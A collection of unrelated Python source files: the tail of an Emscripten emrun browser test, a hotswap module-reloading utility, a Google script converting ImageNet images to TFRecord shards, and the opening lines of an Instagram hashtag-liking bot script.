args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
hotswap.py | #!/usr/bin/env python
"""Automatic replacement of imported Python modules.
The hotswap module watches the source files of imported modules which are
replaced by its new version when the respective source files change.
The need for a program restart during development of long-running programs
like GUI applications for example is reduced.
Additionally this module can be called as a wrapper script:
hotswap.py [OPTIONS] <module.py> [args]
In this case module.py is imported as module and the function
module.main() is called. Hotswapping is enabled so that changes
in the source code take effect without restarting the program.
"""
version = "0.3.1"
__author__ = "Michael Krause"
__email__ = "michael@krause-software.com"
#
# CREDITS
# The idea and first implementation of the mechanism used by this module
# was first made public by Thomas Heller in a Usenet posting
# to comp.lang.python in 2001 (named autoreload.py).
# Updates for new-style classes were taken from a Usenet posting
# by Jeremy Fincher.
__all__ = ['run', 'stop', 'superreload']
import time
import os
import threading
import sys
import types
import imp
import getopt
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
try:
reload
except NameError:
from importlib import reload
if PY2:
TypeType = types.TypeType
ClassType = types.ClassType
else:
TypeType = type
ClassType = type
def _get_compiled_ext():
for ext, mode, typ in imp.get_suffixes():
if typ == imp.PY_COMPILED:
return ext
# the official way to get the extension of compiled files (.pyc or .pyo)
PY_COMPILED_EXT = _get_compiled_ext()
class ModuleWatcher:
SECONDS_BETWEEN_CHECKS = 0.1
SKIP_SYSTEM_MODULES = False
NOTIFYFUNC = None
VERBOSE = False
running = 0
def __init__(self):
# If we don't do this, there may be tracebacks
# when shutting down python.
import atexit
atexit.register(self.stop)
def run(self, skipsystem=SKIP_SYSTEM_MODULES,
seconds=SECONDS_BETWEEN_CHECKS,
notifyfunc=NOTIFYFUNC,
verbose=VERBOSE):
if self.running:
if verbose:
print("# hotswap already running")
return
self.SKIP_SYSTEM_MODULES = skipsystem
self.SECONDS_BETWEEN_CHECKS = seconds
self.NOTIFYFUNC = notifyfunc
self.VERBOSE = verbose
if self.VERBOSE:
print("# starting hotswap seconds=%s, skipsystem=%s" \
% (self.SECONDS_BETWEEN_CHECKS, self.SKIP_SYSTEM_MODULES))
self.running = 1
self.thread = threading.Thread(target=self._check_modules)
self.thread.setDaemon(1)
self.thread.start()
def stop(self):
if not self.running:
if self.VERBOSE:
print("# hotswap not running")
return
self.running = 0
self.thread.join()
if self.VERBOSE:
print("# hotswap stopped")
def _check_modules(self):
last_modified = {}
while self.running:
time.sleep(self.SECONDS_BETWEEN_CHECKS)
for m in list(sys.modules.values()):
if not hasattr(m, '__file__'):
# We only check modules that have a plain file
# as Python source.
continue
if m.__name__ == '__main__':
# __main__ cannot be reloaded without executing
# its code a second time, so we skip it.
continue
file = m.__file__
path, ext = os.path.splitext(file)
if self.SKIP_SYSTEM_MODULES:
# do not check system modules
sysprefix = sys.prefix + os.sep
if file.startswith(sysprefix):
continue
if ext.lower() == '.py':
ext = PY_COMPILED_EXT
if ext != PY_COMPILED_EXT:
continue
sourcefile = path + '.py'
try:
source_mtime = os.stat(sourcefile)[8]
if sourcefile not in last_modified:
last_modified[sourcefile] = source_mtime
continue
else:
if source_mtime <= last_modified[sourcefile]:
continue
last_modified[sourcefile] = source_mtime
except OSError:
continue
try:
superreload(m, verbose=self.VERBOSE)
except:
import traceback
traceback.print_exc(0)
try:
if hasattr(m, 'onHotswap') and callable(m.onHotswap):
# The module can invalidate cached results or post
# redisplay operations by defining function named
# onHotswap that is called after a reload.
m.onHotswap()
if callable(self.NOTIFYFUNC):
self.NOTIFYFUNC(module=m)
except:
import traceback
traceback.print_exc(0)
def update_function(old, new, attrnames):
for name in attrnames:
try:
setattr(old, name, getattr(new, name))
except AttributeError:
pass
def superreload(module,
reload=reload,
_old_objects = {},
verbose=True):
"""superreload (module) -> module
Enhanced version of the builtin reload function.
superreload replaces the class dictionary of every top-level
class in the module with the new one automatically,
as well as every function's code object.
"""
# retrieve the attributes from the module before the reload,
# and remember them in _old_objects.
for name, object in module.__dict__.items():
key = (module.__name__, name)
_old_objects.setdefault(key, []).append(object)
if verbose:
print("# reloading module %r" % module)
newmodule = reload(module)
if newmodule is None:
return module
# XXX We have a problem here if importing the module fails!
# iterate over all objects and update them
for name, new_obj in newmodule.__dict__.items():
# print "updating", `name`, type(new_obj), `new_obj`
key = (newmodule.__name__, name)
if key in _old_objects:
for old_obj in _old_objects[key]:
if type(new_obj) == ClassType:
if hasattr(old_obj.__dict__, 'update'):
old_obj.__dict__.update(new_obj.__dict__)
elif type(new_obj) == types.FunctionType:
update_function(old_obj,
new_obj,
"func_code func_defaults func_doc".split())
elif type(new_obj) == types.MethodType:
update_function(old_obj.im_func,
new_obj.im_func,
"func_code func_defaults func_doc".split())
return newmodule
_watcher = ModuleWatcher()
run = _watcher.run
stop = _watcher.stop
def modulename(path):
return os.path.splitext(path)[0].replace(os.sep, '.')
def importmodule(filename):
"""Returns the imported module of this source file.
This function tries to find this source file as module
on the Python path, so that its typical module name is used.
If this does not work, the directory of this file is inserted
at the beginning of sys.path and the import is attempted again.
"""
sourcefile = os.path.abspath(filename)
modfile = os.path.basename(sourcefile)
# Given an absolute filename of a python source file,
# we need to find it on the Python path to calculate its
# proper module name.
candidates = []
for p in sys.path:
pdir = p + os.sep
checkfile = os.path.join(p, modfile)
if os.path.normcase(sourcefile).startswith(os.path.normcase(pdir)):
relmodfile = sourcefile[len(pdir):]
candidates.append((len(relmodfile), relmodfile))
if candidates:
# Pick the most specific module path from all candidates
candidates.sort()
modname = modulename(candidates[0][1])
else:
modname = modulename(os.path.basename(sourcefile))
try:
# In case the source file was in the Python path
# it can be imported now.
module = __import__(modname, globals(), locals(), [])
except ImportError as e:
failed_modname = str(e).split()[-1]
failed_modname = failed_modname.replace("'", "")
if failed_modname == modname:
# The ImportError wasn't caused by some nested import
# but our module was not found, so we add the source files
# directory to the path and import it again.
modname = modulename(os.path.basename(sourcefile))
sys.path.insert(0, os.path.dirname(sourcefile))
module = __import__(modname, globals(), locals(), [])
else:
import traceback
tb = sys.exc_traceback
if tb:
tb = tb.tb_next
traceback.print_exception(sys.exc_type, sys.exc_value, tb)
# The module to be imported could be found but raised an
# ImportError itself.
raise e
# We have to deal module nesting like logging.handlers
# before calling the modules main function.
components = modname.split('.')
for comp in components[1:]:
module = getattr(module, comp)
return module
#----------------------------------------------------------------------------
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def usage(argv0):
print >>sys.stderr, """Usage: %s [OPTIONS] <module.py>
Import module and call module.main() with hotswap enabled.
Subsequent modifications in module.py and other source files of
modules being used are monitored periodically and put into effect
without restarting the program.
Options:
-h, --help Display this help then exit.
-w, --wait Wait number of seconds between checks. [0.1]
-s, --skipsystem Skip check of system modules beneath (%s). [False]
-v, --verbose Display diagnostic messages. [False]
""" % (argv0, sys.prefix)
#----------------------------------------------------------------------------
def main(argv=None):
if argv is None:
argv = sys.argv
wait = ModuleWatcher.SECONDS_BETWEEN_CHECKS
skipsystem = ModuleWatcher.SKIP_SYSTEM_MODULES
verbose = ModuleWatcher.VERBOSE
# parse command line arguments
try:
try:
opts, args = getopt.getopt(argv[1:], "hw:sv",
["help", "wait",
"skipsystem", "verbose"])
except getopt.error as msg:
raise Usage(msg)
for o, a in opts:
if o in ("-h", "--help"):
usage(argv[0])
return 0
if o in ("-w", "--wait"):
try:
wait = float(a)
except ValueError:
raise Usage("Parameter -w/--wait expects a float value")
if o in ("-s", "--skipsystem"):
skipsystem = True
if o in ("-v", "--verbose"):
verbose = True
except Usage as err:
print >>sys.stderr, "%s:" % argv[0],
print >>sys.stderr, err.msg
print >>sys.stderr, "for help use --help"
return 2
# Remove hotswap options from arguments
if args:
del argv[1:-len(args)]
else:
del argv[1:]
if len(argv) <= 1:
usage(argv[0])
sys.exit(1)
firstarg = argv[1]
sourcefile = os.path.abspath(firstarg)
if not os.path.isfile(sourcefile):
print("%s: File '%s' does not exist." % (os.path.basename(argv[0]),
sourcefile))
sys.exit(1)
try:
module = importmodule(sourcefile)
except ImportError as e:
print("%s: Unable to import '%s' as module: %s" % (os.path.basename(argv[0]),
sourcefile, e))
sys.exit(1)
# Remove hotswap.py from arguments that argv looks as
# if no additional wrapper was present.
del argv[0]
# Start hotswapping
run(skipsystem=skipsystem,
seconds=wait,
verbose=verbose)
# Run the Python source file with hotswapping enabled.
module.main()
if __name__ == '__main__':
main()
|
build_imagenet_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'r') as f:
image_data = f.read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
like_hashtag.py | # -*- coding: utf-8 -*-
import random
import sys
import sys
sys.path.insert(0, "/home/stefanopoma97/bot//insta-bot1")
from glob import glob
import schedule
from instabot import Bot, utils
import os
import sys
import threading
import time
import config_file
from sys import argv
sys.path.append(os.path.join(sys.path[0], '../../'))
bot = Bot(comments_file=config_file.COMMENTS_FILE,
blacklist_file=config_file.BLACKLIST_FILE,
